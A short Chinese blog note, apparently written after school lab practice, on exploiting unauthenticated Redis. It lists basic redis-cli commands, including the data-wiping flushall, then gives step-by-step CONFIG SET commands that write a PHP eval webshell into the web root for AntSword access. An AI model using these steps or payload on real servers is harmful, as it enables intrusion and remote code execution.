redis未授权访问

redis数据库基本命令
redis端口默认6379
1.redis基本命令

连接redis：

redis-cli -h 192.168.63.130

查看redis版本信息、一些具体信息、服务器版本信息等等：

192.168.63.130:6379>info

将变量x的值设为test：

192.168.63.130:6379>set x “test”

是把整个redis数据库删除，一般情况下不要用！！！

192.168.63.130:6379>flushall

查看所有键：

192.168.63.130:6379>KEYS *

获取默认的redis目录、和rdb文件名：可以在修改前先获取，然后走的时候再恢复。

192.168.63.130:6379>CONFIG GET dir

192.168.63.130:6379>CONFIG GET dbfilename

攻击方法：
写马
先连接redis-cli -h 30.10.0.6
从phpinfo中查到网站路径
config set dir /var/www/html/ 设置网站路径，这里必须提前知道网站的路径，这个可以在phpinfo信息中获取
config set dbfilename shell.php 创建文件
set webshell “<?php @eval($_POST[‘c’]);?>”
save
然后蚁剑连接即可，连接的是30.10.0.6/shell.php(这个给新手看下，因为我当初就不知道网站根目录是啥的，蚁剑都不会连，嘻嘻)

这里因为是用的学校靶场练习的，没有截图，手上只有一个当初用redis未授权访问写反弹shell的截图

至于redis未授权访问的其他玩法大家可以参考 https://www.cnblogs.com/bmjoker/p/9548962.html这篇文章